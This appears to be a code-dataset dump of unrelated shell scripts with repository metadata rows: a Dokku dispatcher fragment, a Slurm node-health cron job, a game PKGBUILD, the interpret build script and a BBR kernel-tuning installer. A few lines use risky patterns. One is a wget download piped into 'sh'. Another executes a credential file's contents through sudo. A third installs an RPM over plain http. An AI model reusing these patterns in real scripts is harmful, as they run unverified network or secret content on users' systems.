! has_tty && DOKKU_QUIET_OUTPUT=1
if [[ $(id -un) != "dokku" && $1 != plugins-install* && $1 != "plugins-update" ]]; then
sudo -u dokku -E -H $0 "$@"
exit
fi
if [[ -n "$SSH_ORIGINAL_COMMAND" ]]; then
export -n SSH_ORIGINAL_COMMAND
if [[ $1 =~ config-* ]];then
xargs $0 <<<$SSH_ORIGINAL_COMMAND
exit $?
else
$0 $SSH_ORIGINAL_COMMAND
exit $?
fi
fi
case "$1" in
receive)
APP="$2"; IMAGE="dokku/$APP"; IMAGE_SOURCE_TYPE="$3"; TMP_WORK_DIR="$4"
dokku_log_info1 "Cleaning up..."
dokku cleanup
dokku_log_info1 "Building $APP from $IMAGE_SOURCE_TYPE..."
dokku build "$APP" "$IMAGE_SOURCE_TYPE" "$TMP_WORK_DIR"
dokku_log_info1 "Releasing $APP..."
dokku release "$APP" "$IMAGE_SOURCE_TYPE"
dokku_log_info1 "Deploying $APP..."
dokku deploy "$APP"
dokku_log_info2 "Application deployed:"
dokku urls "$APP" | sed "s/^/ /"
echo
;;
deploy)
APP="$2"; IMAGE="dokku/$APP"
pluginhook pre-deploy $APP
if [[ -f "$DOKKU_ROOT/$APP/CONTAINER" ]]; then
oldid=$(< "$DOKKU_ROOT/$APP/CONTAINER")
fi
# start the app
DOCKER_ARGS=$(: | pluginhook docker-args $APP deploy)
DOCKER_ARGS+=$(: | pluginhook docker-args-deploy $APP)
BIND_EXTERNAL=$(pluginhook bind-external-ip $APP)
is_image_buildstep_based "$IMAGE" && DOKKU_BUILDSTEP=true
[[ -n "$DOKKU_BUILDSTEP" ]] && START_CMD="/start web"
[[ -z "$DOKKU_BUILDSTEP" ]] && eval "$(grep DOKKU_DOCKERFILE_PORT $DOKKU_ROOT/$APP/ENV)"
if [[ "$BIND_EXTERNAL" = "false" ]];then
port=${DOKKU_DOCKERFILE_PORT:=5000}
id=$(docker run -d -e PORT=$port $DOCKER_ARGS $IMAGE $START_CMD)
ipaddr=$(docker inspect --format '{{ .NetworkSettings.IPAddress }}' $id)
else
id=$(docker run -d -p 5000 -e PORT=5000 $DOCKER_ARGS $IMAGE $START_CMD)
port=$(docker port $id 5000 | sed 's/[0-9.]*://')
ipaddr=127.0.0.1
fi
# if we can't post-deploy successfully, kill new container
kill_new() {
docker inspect $id &> /dev/null && docker kill $id > /dev/null
trap - INT TERM EXIT
kill -9 $$
}
# run checks first, then post-deploy hooks, which switches Nginx traffic
if [[ -z "$DOKKU_SKIP_CHECKS" ]] ; then
trap kill_new INT TERM EXIT
dokku_log_info1 "Running pre-flight checks"
pluginhook check-deploy $APP $port $ipaddr $id
trap - INT TERM EXIT
fi
# now using the new container
echo $id > "$DOKKU_ROOT/$APP/CONTAINER"
echo $ipaddr > "$DOKKU_ROOT/$APP/IP"
echo $port > "$DOKKU_ROOT/$APP/PORT"
echo "http://$(< "$DOKKU_ROOT/HOSTNAME"):$port" > "$DOKKU_ROOT/$APP/URL"
dokku_log_info1 "Running post-deploy"
pluginhook post-deploy $APP $port $ipaddr
# kill the old container
if [[ -n "$oldid" ]]; then
# Let the old container finish processing requests, before terminating it
WAIT="${DOKKU_WAIT_TO_RETIRE:-60}"
dokku_log_info1 "Shutting down old container in $WAIT seconds"
(
exec >/dev/null 2>/dev/null </dev/null
trap '' INT HUP
sleep $WAIT
docker kill $oldid
) & disown -a
# Use trap since disown/nohup don't seem to keep child alive
# Give child process just enough time to set the traps
sleep 0.1
fi
;;
cleanup)
# delete all non-running container
# shellcheck disable=SC2046
docker rm $(docker ps -a -f 'status=exited' -q) &> /dev/null &
# delete unused images
# shellcheck disable=SC2046
docker rmi $(docker images -f 'dangling=true' -q) &> /dev/null &
;;
plugins)
ls -1 -d $PLUGIN_PATH/*/
;;
plugins-install)
pluginhook install
;;
plugins-install-dependencies)
pluginhook dependencies
;;
plugins-update)
pluginhook update
;;
# DEPRECATED as of v0.3.14
deploy:all)
echo "*DEPRECATED* in v0.3.14: deploy:all will be removed in future versions"
dokku ps:restartall
;;
help|'')
echo "Usage: dokku [--quiet|--trace|--rm-container|--rm|--force] COMMAND <app> [command-specific-options]"
echo ""
echo "Options:"
cat<<EOF | pluginhook commands help | sort
help Print the list of commands
plugins Print active plugins
plugins-install Install active plugins
plugins-update Update active plugins
EOF
;;
*)
implemented=0
for script in $PLUGIN_PATH/*/commands; do
set +e; $script "$@" ; exit_code=$? ; set -e
if [ "$exit_code" -eq "$DOKKU_NOT_IMPLEMENTED_EXIT" ]; then
continue
fi
implemented=1
if [ "$exit_code" -ne "$DOKKU_VALID_EXIT" ]; then
exit $exit_code
fi
done
if [ "$implemented" -eq 0 ]; then
dokku_log_warn "\`$*\` is not a dokku command."
dokku_log_warn "See \`dokku help\` for a list of available commands."
exit 1
fi
;;
esac
| true
|
022de872e50bfda986176b8c5408bb9f2452b090
|
Shell
|
ishan747/Jetstream_Elastic_Slurm
|
/cron-node-check.sh
|
UTF-8
| 1,237
| 3.234375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
sinfo_check=$(sinfo | grep -iE "drain|down")
#mail_domain=$(curl -s https://ipinfo.io/hostname)
mail_domain=$(host $(curl -s http://169.254.169.254/latest/meta-data/public-ipv4) | sed 's/.*pointer \(.*\)./\1/')
email_addr=""
try_count=0
declare -i try_count
until [[ -n $mail_domain || $try_count -ge 10 ]];
do
sleep 3
mail_domain=$(curl -s https://ipinfo.io/hostname)
try_count=$try_count+1
echo $mail_domain, $try_count
done
if [[ $try_count -ge 10 ]]; then
echo "failed to get domain name!"
exit 1
fi
if [[ -n $sinfo_check ]]; then
echo $sinfo_check | mailx -r "node-check@$mail_domain" -s "NODE IN BAD STATE - $mail_domain" $email_addr
# echo "$sinfo_check mailx -r "node-check@$mail_domain" -s "NODE IN BAD STATE - $mail_domain" $email_addr" # TESTING LINE
fi
#Check for ACTIVE nodes without running/cf/cg jobs
squeue_check=$(squeue -h -t CF,CG,R)
#source the openrc.sh for instance check
$(sudo cat /etc/slurm/openrc.sh)
compute_node_check=$(openstack server list | awk '/compute/ && /ACTIVE/')
if [[ -n $compute_node_check && -z $squeue_check ]]; then
echo $compute_node_check $squeue_check | mailx -r "node-check@$mail_domain" -s "NODE IN ACTIVE STATE WITHOUT JOBS- $mail_domain" $email_addr
fi
| true
|
a26637aa5f7bfa83ac6319b998a02239c20abceb
|
Shell
|
MalvinJazz/fantastic-chainsaw
|
/www/json/motivos/demon.sh
|
UTF-8
| 469
| 2.953125
| 3
|
[] |
no_license
|
#! /bin/sh
clear
for motivo in "CR" "MU" "MA" "DH"
do
echo -e "\e[31mDescargando archivo $motivo\e[0m"
wget -O "$motivo.sindepurar.json" "https://www.denunciappguatemala.com/denuncias/api/d1/motivo?tipo="$motivo | "sh"
echo -e "\e[1;32mDepurando archivo $motivo\e[0m"
perl -p -e 's/("meta"): {(\n|[^}])*},|"cantidad": \d*,|"resource_uri": "", / /g' "$motivo.sindepurar.json" > "$motivo.json" #| cat "departamento$a.json"
rm "$motivo.sindepurar.json"
done
| true
|
607705d0d3a3a78efdd27bbe59e8c5ac3fa2afe6
|
Shell
|
AlexanderMattheis/linux-enhancement-scripts
|
/src/services_lister.sh
|
UTF-8
| 357
| 3.1875
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
OUTPUT_NAME="ServicesLister.out"
# finds with 'grep' all active services, ones that are starting with '[ + ]'
# removes all '[ + ]' at the beginning with 'sed'
# removes all resulting white spaces at the beginning with 'sed'
service --status-all | grep --only-matching " \[ + \] [A-Za-z0-9\_\-]*" | sed 's/\[ + \]//g; s/ //g' > $OUTPUT_NAME
| true
|
385c747ecdfd6c75e5ffa79e48b0aa1fd736807a
|
Shell
|
petronny/aur3-mirror
|
/uqm-new/PKGBUILD
|
UTF-8
| 1,863
| 2.53125
| 3
|
[] |
no_license
|
# Quick note: Nearly all of the stuff in here is from the official uqm package.
# The things changed is the version, the conflicts/provides, the
# package name and adding a menu icon.
# uqm package
# Maintainer : Daenyth <Daenyth+Arch _AT_ gmail _DOT_ com>
# Contributor : wizzomafizzo <wizzomafizzo@gmail.com>
# Contributor: tochiro@no.spam.mail.berlios.de
# Contributor: sh__
# uqm-new
# Maintainer : Jookia <166291@gmail.com.spam>
pkgname=uqm-new
pkgver=0.7.0
pkgrel=1
pkgdesc="The Ur-Quan Masters is a port of Star Control 2"
arch=(i686 x86_64)
url="http://sc2.sf.net/"
license=('GPL')
depends=('libmikmod' 'libvorbis' 'sdl_image' 'libgl')
makedepends=('imagemagick')
optdepends=('uqm-sound: For extra music and conversation audio')
conflicts=('uqm')
provides=('uqm')
source=(http://downloads.sourceforge.net/sourceforge/sc2/uqm-${pkgver}-source.tgz
http://downloads.sourceforge.net/sourceforge/sc2/uqm-0.7.0-content.uqm
config.state uqm uqm.desktop uqm.png)
md5sums=('f9018ea0493d7dac6a9e1006b00af7df' '2f36dcb15274dbbcb5e266f2ed84d5b2'
'07f0a0e74a0b1c706940cc43d5a4160c' '07e64632fce6323a14ab558d0214b885'
'771272cd2e4073db593f4dff14aea582' '57b7d8f10a05431eb7aa3d75724b43b9')
build() {
cd $srcdir/uqm-$pkgver
cp $srcdir/config.state .
sed -e "/INPUT_install_prefix/ s|replaceme|$pkgdir/usr|" \
-i config.state
echo | ./build.sh uqm config || return 1
./build.sh uqm || return 1
./build.sh uqm install
install -Dm644 $srcdir/uqm-0.7.0-content.uqm \
$pkgdir/usr/share/uqm/content/packages/uqm-0.7.0-content.uqm
rm $pkgdir/usr/bin/uqm
install -Dm755 $srcdir/uqm $pkgdir/usr/bin/uqm
# Desktop launcher with icon
install -D -m644 "${srcdir}/uqm.desktop" "${pkgdir}/usr/share/applications/uqm.desktop"
install -D -m644 "${srcdir}/uqm.png" "${pkgdir}/usr/share/pixmaps/uqm.png"
}
# vim:set ts=2 sw=2 et:
| true
|
c2118725785d190496d30c550b74597e4ec2fbe0
|
Shell
|
gmlymayday/interpret
|
/build.sh
|
UTF-8
| 16,110
| 3.421875
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
clang_pp_bin=clang++
g_pp_bin=g++
os_type=`uname`
script_path="`dirname \"$0\"`"
if [ "$os_type" = "Darwin" ]; then
echo "Creating initial directories"
[ -d "$script_path/staging" ] || mkdir -p "$script_path/staging"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
[ -d "$script_path/src/python/interpret/lib" ] || mkdir -p "$script_path/src/python/interpret/lib"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
echo "Compiling with $clang_pp_bin for $os_type release|x64"
[ -d "$script_path/tmp/clang/intermediate/release/mac/x64/ebmcore" ] || mkdir -p "$script_path/tmp/clang/intermediate/release/mac/x64/ebmcore"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
[ -d "$script_path/tmp/clang/bin/release/mac/x64/ebmcore" ] || mkdir -p "$script_path/tmp/clang/bin/release/mac/x64/ebmcore"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
compile_out=`$clang_pp_bin "$script_path/src/core/ebmcore/DataSetByAttribute.cpp" "$script_path/src/core/ebmcore/DataSetByAttributeCombination.cpp" "$script_path/src/core/ebmcore/InteractionDetection.cpp" "$script_path/src/core/ebmcore/Logging.cpp" "$script_path/src/core/ebmcore/SamplingWithReplacement.cpp" "$script_path/src/core/ebmcore/Training.cpp" -I"$script_path/src/core/ebmcore" -I"$script_path/src/core/inc" -std=c++11 -fpermissive -fvisibility=hidden -fvisibility-inlines-hidden -O3 -march=core2 -DEBMCORE_EXPORTS -fpic -dynamiclib -m64 -DNDEBUG -install_name @rpath/ebmcore_mac_x64.dylib -o "$script_path/tmp/clang/bin/release/mac/x64/ebmcore/ebmcore_mac_x64.dylib" 2>&1`
ret_code=$?
echo -n "$compile_out"
echo -n "$compile_out" > "$script_path/tmp/clang/intermediate/release/mac/x64/ebmcore/ebmcore_release_mac_x64_build_log.txt"
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
cp "$script_path/tmp/clang/bin/release/mac/x64/ebmcore/ebmcore_mac_x64.dylib" "$script_path/src/python/interpret/lib/"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
cp "$script_path/tmp/clang/bin/release/mac/x64/ebmcore/ebmcore_mac_x64.dylib" "$script_path/staging/"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
echo "Compiling with $clang_pp_bin for $os_type debug|x64"
[ -d "$script_path/tmp/clang/intermediate/debug/mac/x64/ebmcore" ] || mkdir -p "$script_path/tmp/clang/intermediate/debug/mac/x64/ebmcore"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
[ -d "$script_path/tmp/clang/bin/debug/mac/x64/ebmcore" ] || mkdir -p "$script_path/tmp/clang/bin/debug/mac/x64/ebmcore"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
compile_out=`$clang_pp_bin "$script_path/src/core/ebmcore/DataSetByAttribute.cpp" "$script_path/src/core/ebmcore/DataSetByAttributeCombination.cpp" "$script_path/src/core/ebmcore/InteractionDetection.cpp" "$script_path/src/core/ebmcore/Logging.cpp" "$script_path/src/core/ebmcore/SamplingWithReplacement.cpp" "$script_path/src/core/ebmcore/Training.cpp" -I"$script_path/src/core/ebmcore" -I"$script_path/src/core/inc" -std=c++11 -fpermissive -fvisibility=hidden -fvisibility-inlines-hidden -O3 -march=core2 -DEBMCORE_EXPORTS -fpic -dynamiclib -m64 -install_name @rpath/ebmcore_mac_x64_debug.dylib -o "$script_path/tmp/clang/bin/debug/mac/x64/ebmcore/ebmcore_mac_x64_debug.dylib" 2>&1`
ret_code=$?
echo -n "$compile_out"
echo -n "$compile_out" > "$script_path/tmp/clang/intermediate/debug/mac/x64/ebmcore/ebmcore_debug_mac_x64_build_log.txt"
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
cp "$script_path/tmp/clang/bin/debug/mac/x64/ebmcore/ebmcore_mac_x64_debug.dylib" "$script_path/src/python/interpret/lib/"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
cp "$script_path/tmp/clang/bin/debug/mac/x64/ebmcore/ebmcore_mac_x64_debug.dylib" "$script_path/staging/"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
# echo "Compiling with $clang_pp_bin for $os_type release|x86"
# [ -d "$script_path/tmp/clang/intermediate/release/mac/x86/ebmcore" ] || mkdir -p "$script_path/tmp/clang/intermediate/release/mac/x86/ebmcore"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# [ -d "$script_path/tmp/clang/bin/release/mac/x86/ebmcore" ] || mkdir -p "$script_path/tmp/clang/bin/release/mac/x86/ebmcore"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# compile_out=`$clang_pp_bin "$script_path/src/core/ebmcore/DataSetByAttribute.cpp" "$script_path/src/core/ebmcore/DataSetByAttributeCombination.cpp" "$script_path/src/core/ebmcore/InteractionDetection.cpp" "$script_path/src/core/ebmcore/Logging.cpp" "$script_path/src/core/ebmcore/SamplingWithReplacement.cpp" "$script_path/src/core/ebmcore/Training.cpp" -I"$script_path/src/core/ebmcore" -I"$script_path/src/core/inc" -std=c++11 -fpermissive -fvisibility=hidden -fvisibility-inlines-hidden -O3 -march=core2 -DEBMCORE_EXPORTS -fpic -dynamiclib -m32 -DNDEBUG -install_name @rpath/ebmcore_mac_x86.dylib -o "$script_path/tmp/clang/bin/release/mac/x86/ebmcore/ebmcore_mac_x86.dylib" 2>&1`
# ret_code=$?
# echo -n "$compile_out"
# echo -n "$compile_out" > "$script_path/tmp/clang/intermediate/release/mac/x86/ebmcore/ebmcore_release_mac_x86_build_log.txt"
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# cp "$script_path/tmp/clang/bin/release/mac/x86/ebmcore/ebmcore_mac_x86.dylib" "$script_path/src/python/interpret/lib/"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# cp "$script_path/tmp/clang/bin/release/mac/x86/ebmcore/ebmcore_mac_x86.dylib" "$script_path/staging/"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# echo "Compiling with $clang_pp_bin for $os_type debug|x86"
# [ -d "$script_path/tmp/clang/intermediate/debug/mac/x86/ebmcore" ] || mkdir -p "$script_path/tmp/clang/intermediate/debug/mac/x86/ebmcore"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# [ -d "$script_path/tmp/clang/bin/debug/mac/x86/ebmcore" ] || mkdir -p "$script_path/tmp/clang/bin/debug/mac/x86/ebmcore"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# compile_out=`$clang_pp_bin "$script_path/src/core/ebmcore/DataSetByAttribute.cpp" "$script_path/src/core/ebmcore/DataSetByAttributeCombination.cpp" "$script_path/src/core/ebmcore/InteractionDetection.cpp" "$script_path/src/core/ebmcore/Logging.cpp" "$script_path/src/core/ebmcore/SamplingWithReplacement.cpp" "$script_path/src/core/ebmcore/Training.cpp" -I"$script_path/src/core/ebmcore" -I"$script_path/src/core/inc" -std=c++11 -fpermissive -fvisibility=hidden -fvisibility-inlines-hidden -O3 -march=core2 -DEBMCORE_EXPORTS -fpic -dynamiclib -m32 -install_name @rpath/ebmcore_mac_x86_debug.dylib -o "$script_path/tmp/clang/bin/debug/mac/x86/ebmcore/ebmcore_mac_x86_debug.dylib" 2>&1`
# ret_code=$?
# echo -n "$compile_out"
# echo -n "$compile_out" > "$script_path/tmp/clang/intermediate/debug/mac/x86/ebmcore/ebmcore_debug_mac_x86_build_log.txt"
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# cp "$script_path/tmp/clang/bin/debug/mac/x86/ebmcore/ebmcore_mac_x86_debug.dylib" "$script_path/src/python/interpret/lib/"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# cp "$script_path/tmp/clang/bin/debug/mac/x86/ebmcore/ebmcore_mac_x86_debug.dylib" "$script_path/staging/"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
elif [ "$os_type" = "Linux" ]; then
# to cross compile for different architectures x86/x64, run the following command: sudo apt-get install g++-multilib
echo "Creating initial directories"
[ -d "$script_path/staging" ] || mkdir -p "$script_path/staging"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
[ -d "$script_path/src/python/interpret/lib" ] || mkdir -p "$script_path/src/python/interpret/lib"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
echo "Compiling with $g_pp_bin for $os_type release|x64"
[ -d "$script_path/tmp/gcc/intermediate/release/linux/x64/ebmcore" ] || mkdir -p "$script_path/tmp/gcc/intermediate/release/linux/x64/ebmcore"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
[ -d "$script_path/tmp/gcc/bin/release/linux/x64/ebmcore" ] || mkdir -p "$script_path/tmp/gcc/bin/release/linux/x64/ebmcore"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
compile_out=`$g_pp_bin "$script_path/src/core/ebmcore/DataSetByAttribute.cpp" "$script_path/src/core/ebmcore/DataSetByAttributeCombination.cpp" "$script_path/src/core/ebmcore/InteractionDetection.cpp" "$script_path/src/core/ebmcore/Logging.cpp" "$script_path/src/core/ebmcore/SamplingWithReplacement.cpp" "$script_path/src/core/ebmcore/Training.cpp" -I"$script_path/src/core/ebmcore" -I"$script_path/src/core/inc" -std=c++11 -fpermissive -fvisibility=hidden -fvisibility-inlines-hidden -O3 -march=core2 -DEBMCORE_EXPORTS -fpic -Wl,--version-script="$script_path/src/core/ebmcore/EbmCoreExports.txt" -Wl,--exclude-libs,ALL -Wl,--wrap=memcpy "$script_path/src/core/ebmcore/WrapFunc.cpp" -static-libgcc -static-libstdc++ -shared -m64 -DNDEBUG -o "$script_path/tmp/gcc/bin/release/linux/x64/ebmcore/ebmcore_linux_x64.so" 2>&1`
ret_code=$?
echo -n "$compile_out"
echo -n "$compile_out" > "$script_path/tmp/gcc/intermediate/release/linux/x64/ebmcore/ebmcore_release_linux_x64_build_log.txt"
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
cp "$script_path/tmp/gcc/bin/release/linux/x64/ebmcore/ebmcore_linux_x64.so" "$script_path/src/python/interpret/lib/"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
cp "$script_path/tmp/gcc/bin/release/linux/x64/ebmcore/ebmcore_linux_x64.so" "$script_path/staging/"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
echo "Compiling with $g_pp_bin for $os_type debug|x64"
[ -d "$script_path/tmp/gcc/intermediate/debug/linux/x64/ebmcore" ] || mkdir -p "$script_path/tmp/gcc/intermediate/debug/linux/x64/ebmcore"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
[ -d "$script_path/tmp/gcc/bin/debug/linux/x64/ebmcore" ] || mkdir -p "$script_path/tmp/gcc/bin/debug/linux/x64/ebmcore"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
compile_out=`$g_pp_bin "$script_path/src/core/ebmcore/DataSetByAttribute.cpp" "$script_path/src/core/ebmcore/DataSetByAttributeCombination.cpp" "$script_path/src/core/ebmcore/InteractionDetection.cpp" "$script_path/src/core/ebmcore/Logging.cpp" "$script_path/src/core/ebmcore/SamplingWithReplacement.cpp" "$script_path/src/core/ebmcore/Training.cpp" -I"$script_path/src/core/ebmcore" -I"$script_path/src/core/inc" -std=c++11 -fpermissive -fvisibility=hidden -fvisibility-inlines-hidden -O3 -march=core2 -DEBMCORE_EXPORTS -fpic -Wl,--version-script="$script_path/src/core/ebmcore/EbmCoreExports.txt" -Wl,--exclude-libs,ALL -Wl,--wrap=memcpy "$script_path/src/core/ebmcore/WrapFunc.cpp" -static-libgcc -static-libstdc++ -shared -m64 -o "$script_path/tmp/gcc/bin/debug/linux/x64/ebmcore/ebmcore_linux_x64_debug.so" 2>&1`
ret_code=$?
echo -n "$compile_out"
echo -n "$compile_out" > "$script_path/tmp/gcc/intermediate/debug/linux/x64/ebmcore/ebmcore_debug_linux_x64_build_log.txt"
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
cp "$script_path/tmp/gcc/bin/debug/linux/x64/ebmcore/ebmcore_linux_x64_debug.so" "$script_path/src/python/interpret/lib/"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
cp "$script_path/tmp/gcc/bin/debug/linux/x64/ebmcore/ebmcore_linux_x64_debug.so" "$script_path/staging/"
ret_code=$?
if [ $ret_code -ne 0 ]; then
exit $ret_code
fi
# echo "Compiling with $g_pp_bin for $os_type release|x86"
# [ -d "$script_path/tmp/gcc/intermediate/release/linux/x86/ebmcore" ] || mkdir -p "$script_path/tmp/gcc/intermediate/release/linux/x86/ebmcore"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# [ -d "$script_path/tmp/gcc/bin/release/linux/x86/ebmcore" ] || mkdir -p "$script_path/tmp/gcc/bin/release/linux/x86/ebmcore"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# compile_out=`$g_pp_bin "$script_path/src/core/ebmcore/DataSetByAttribute.cpp" "$script_path/src/core/ebmcore/DataSetByAttributeCombination.cpp" "$script_path/src/core/ebmcore/InteractionDetection.cpp" "$script_path/src/core/ebmcore/Logging.cpp" "$script_path/src/core/ebmcore/SamplingWithReplacement.cpp" "$script_path/src/core/ebmcore/Training.cpp" -I"$script_path/src/core/ebmcore" -I"$script_path/src/core/inc" -std=c++11 -fpermissive -fvisibility=hidden -fvisibility-inlines-hidden -O3 -march=core2 -DEBMCORE_EXPORTS -fpic -Wl,--version-script="$script_path/src/core/ebmcore/EbmCoreExports.txt" -Wl,--exclude-libs,ALL -Wl,--wrap=memcpy "$script_path/src/core/ebmcore/WrapFunc.cpp" -static-libgcc -static-libstdc++ -shared -m32 -DNDEBUG -o "$script_path/tmp/gcc/bin/release/linux/x86/ebmcore/ebmcore_linux_x86.so" 2>&1`
# ret_code=$?
# echo -n "$compile_out"
# echo -n "$compile_out" > "$script_path/tmp/gcc/intermediate/release/linux/x86/ebmcore/ebmcore_release_linux_x86_build_log.txt"
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# cp "$script_path/tmp/gcc/bin/release/linux/x86/ebmcore/ebmcore_linux_x86.so" "$script_path/src/python/interpret/lib/"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# cp "$script_path/tmp/gcc/bin/release/linux/x86/ebmcore/ebmcore_linux_x86.so" "$script_path/staging/"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# echo "Compiling with $g_pp_bin for $os_type debug|x86"
# [ -d "$script_path/tmp/gcc/intermediate/debug/linux/x86/ebmcore" ] || mkdir -p "$script_path/tmp/gcc/intermediate/debug/linux/x86/ebmcore"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# [ -d "$script_path/tmp/gcc/bin/debug/linux/x86/ebmcore" ] || mkdir -p "$script_path/tmp/gcc/bin/debug/linux/x86/ebmcore"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# compile_out=`$g_pp_bin "$script_path/src/core/ebmcore/DataSetByAttribute.cpp" "$script_path/src/core/ebmcore/DataSetByAttributeCombination.cpp" "$script_path/src/core/ebmcore/InteractionDetection.cpp" "$script_path/src/core/ebmcore/Logging.cpp" "$script_path/src/core/ebmcore/SamplingWithReplacement.cpp" "$script_path/src/core/ebmcore/Training.cpp" -I"$script_path/src/core/ebmcore" -I"$script_path/src/core/inc" -std=c++11 -fpermissive -fvisibility=hidden -fvisibility-inlines-hidden -O3 -march=core2 -DEBMCORE_EXPORTS -fpic -Wl,--version-script="$script_path/src/core/ebmcore/EbmCoreExports.txt" -Wl,--exclude-libs,ALL -Wl,--wrap=memcpy "$script_path/src/core/ebmcore/WrapFunc.cpp" -static-libgcc -static-libstdc++ -shared -m32 -o "$script_path/tmp/gcc/bin/debug/linux/x86/ebmcore/ebmcore_linux_x86_debug.so" 2>&1`
# ret_code=$?
# echo -n "$compile_out"
# echo -n "$compile_out" > "$script_path/tmp/gcc/intermediate/debug/linux/x86/ebmcore/ebmcore_debug_linux_x86_build_log.txt"
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# cp "$script_path/tmp/gcc/bin/debug/linux/x86/ebmcore/ebmcore_linux_x86_debug.so" "$script_path/src/python/interpret/lib/"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
# cp "$script_path/tmp/gcc/bin/debug/linux/x86/ebmcore/ebmcore_linux_x86_debug.so" "$script_path/staging/"
# ret_code=$?
# if [ $ret_code -ne 0 ]; then
# exit $ret_code
# fi
else
echo "OS $os_type not recognized. We support $clang_pp_bin on Darwin and $g_pp_bin on Linux"
exit 1
fi
| true
|
264515e3328269515d842e665e3d563bd831f53c
|
Shell
|
learningendless/doubi
|
/bbr7.sh
|
UTF-8
| 1,771
| 3.109375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH
#=================================================
# System Required: Debian/Ubuntu
# Description: TCP-BBR
# Version: 1.0.22
# Author: hombo125
# Blog: https://github.com/hombo125
#=================================================
echo "Running system optimization and enable Google BBR..."
rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org
rpm -Uvh http://www.elrepo.org/elrepo-release-7.0-3.el7.elrepo.noarch.rpm
yum remove kernel-headers -y
yum --enablerepo=elrepo-kernel install kernel-ml kernel-ml-headers -y
grub2-set-default 0
echo "tcp_bbr" >> /etc/modules-load.d/modules.conf
cat >> /etc/security/limits.conf << EOF
* soft nofile 51200
* hard nofile 51200
EOF
ulimit -n 51200
cat >> /etc/sysctl.conf << EOF
fs.file-max = 51200
net.core.default_qdisc = fq
net.core.rmem_max = 67108864
net.core.wmem_max = 67108864
net.core.netdev_max_backlog = 250000
net.core.somaxconn = 4096
net.ipv4.tcp_congestion_control = bbr
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_tw_reuse = 1
net.ipv4.tcp_fin_timeout = 30
net.ipv4.tcp_keepalive_time = 1200
net.ipv4.ip_local_port_range = 10000 65000
net.ipv4.tcp_max_syn_backlog = 8192
net.ipv4.tcp_max_tw_buckets = 5000
net.ipv4.tcp_fastopen = 3
net.ipv4.tcp_rmem = 4096 87380 67108864
net.ipv4.tcp_wmem = 4096 65536 67108864
net.ipv4.tcp_mtu_probing = 1
EOF
sysctl -p
echo "System require a reboot to complete the installation process, press Y to continue, or press any key else to exit this script."
read is_reboot
if [[ ${is_reboot} == "y" || ${is_reboot} == "Y" ]]; then
reboot
else
echo -e "${green}Info:${plain} Reboot has been canceled..."
exit 0
fi
| true
|
43c837b2c753c59449ed3a244cf4c87186c8dc7f
|
Shell
|
NishuGoel/component-libr
|
/lib/cli/test/run_tests.sh
|
UTF-8
| 1,170
| 3.921875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# exit on error
set -e
declare test_root=$PWD
# remove run directory before exit to prevent yarn.lock spoiling
function cleanup {
rm -rfd ${test_root}/run
}
trap cleanup EXIT
fixtures_dir='fixtures'
# parse command-line options
# '-f' sets fixtures directory
while getopts ":f:" opt; do
case $opt in
f)
fixtures_dir=$OPTARG
;;
esac
